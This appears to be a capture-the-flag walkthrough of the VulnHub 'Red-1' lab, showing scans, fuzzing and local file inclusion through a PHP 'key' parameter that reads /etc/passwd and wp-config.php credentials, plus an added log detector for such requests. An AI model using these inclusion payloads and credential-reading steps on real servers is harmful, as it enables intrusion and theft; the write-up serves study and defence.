Attacker source address: 192.168.43.118
Host discovery: sudo nmap -sP 192.168.0.1/24
---> 192.168.43.28
Port scan: sudo nmap -sC -sV -p- 192.168.0.106
---> Open ports: 22, 80
---> /wp-admin/ WordPress 5.8.1 Apache 2.4.41 http-robots.txt
Browser visit: http://192.168.0.106 --> page renders without CSS
The page links point to http://redrocks.win -> add a hosts entry for it
Browser visit: http://redrocks.win --> renders correctly --> follow the links
gobuster dir -u http://192.168.43.28 -w /SecLists/Web-Shells/backdoor_list.txt -x php
--> /NetworkFileManagerPHP.php
Visiting it in the browser --> 500 error
Parameter fuzzing:
wfuzz -c -w /SecLists/Discovery/Web-Content/burp-parameter-names.txt -u "http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=/etc/passwd"
wfuzz options used:
-w specify a wordlist; -z specify a payload source, e.g. a wordlist file
-c colored output
-sc 200 show only responses with the given status code
-hc 404 hide responses with status code 404
--> key
?key=/etc/passwd
--> john:x:1000:1000:john:/home/john:/bin/bash
--> oxdf:x:1002:1002:,,,:/home/oxdf:/bin/bash
Read the script's own source through the php://filter wrapper: http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php
<?php
// Vulnerable as found on the target: the 'key' parameter is passed to include()
// without validation, so any local path or php:// wrapper can be loaded.
$file = $_GET['key'];
if(isset($file))
{
include("$file");
}
else
{
include("NetworkFileManagerPHP.php");
}
/* VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw== */
?>
Base64-decoding the string in the comment:
--> That password alone won't help you! Hashcat says rules are rules
Read the WordPress configuration the same way: http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php
--> define( 'DB_USER', 'john' );
--> define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );
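The three requests above (/etc/passwd, php://filter on the script itself, php://filter on wp-config.php) all leave a distinctive trace in the web server's access log. The following detector is an added example, not part of the original write-up: it parses Apache combined-format lines and flags query parameters carrying php:// wrappers, ../ traversal, or well-known sensitive file names. The log lines are constructed to mirror the write-up's requests; the regexes and the alert format are my own assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" access log; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns that indicate file-inclusion or wrapper abuse in a decoded parameter value.
SUSPICIOUS = [
    ("php_wrapper", re.compile(r"^php://", re.I)),                  # php://filter, php://input, ...
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),           # ../ or ..\ path segments
    ("sensitive_file", re.compile(r"(^|[/=\\])(etc/passwd|etc/shadow|wp-config\.php)$", re.I)),
]

def inspect_request(target):
    """Return [(param_name, reason), ...] for every query parameter matching a pattern."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(raw)  # parse_qsl decoded once; a second pass catches double-encoding
        for reason, pattern in SUSPICIOUS:
            if pattern.search(value):
                findings.append((name, reason))
    return findings

def scan_log(lines):
    """Walk access-log lines and return one alert dict per (request, parameter, reason)."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the whole scan
        for param, reason in inspect_request(m["target"]):
            alerts.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                           "param": param, "reason": reason, "target": m["target"]})
    return alerts

# Constructed sample lines modelled on the requests in the write-up (not real captures).
SAMPLE_LOG = """\
192.168.43.118 - - [10/Oct/2021:12:00:01 +0000] "GET /NetworkFileManagerPHP.php?key=/etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.68.0"
192.168.43.118 - - [10/Oct/2021:12:00:09 +0000] "GET /NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php HTTP/1.1" 200 4012 "-" "curl/7.68.0"
192.168.43.50 - - [10/Oct/2021:12:00:15 +0000] "GET /index.php?p=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.43.118 - - [10/Oct/2021:12:00:21 +0000] "GET /NetworkFileManagerPHP.php?key=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "curl/7.68.0"
"""

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG.splitlines()):
        print(f'{a["ts"]} {a["ip"]} {a["reason"]:15} {a["param"]}= {a["target"]}')
```

The fix on the server side is the usual one for this bug class: resolve the requested name against an allowlist of includable files instead of passing it to include().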
SSH login with that password failed
Generate a candidate wordlist with hashcat rules: hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > password.txt
Originally published on the WeChat official account (北京路劲科技有限公司): Target practice No.4, VulnHub range Red-1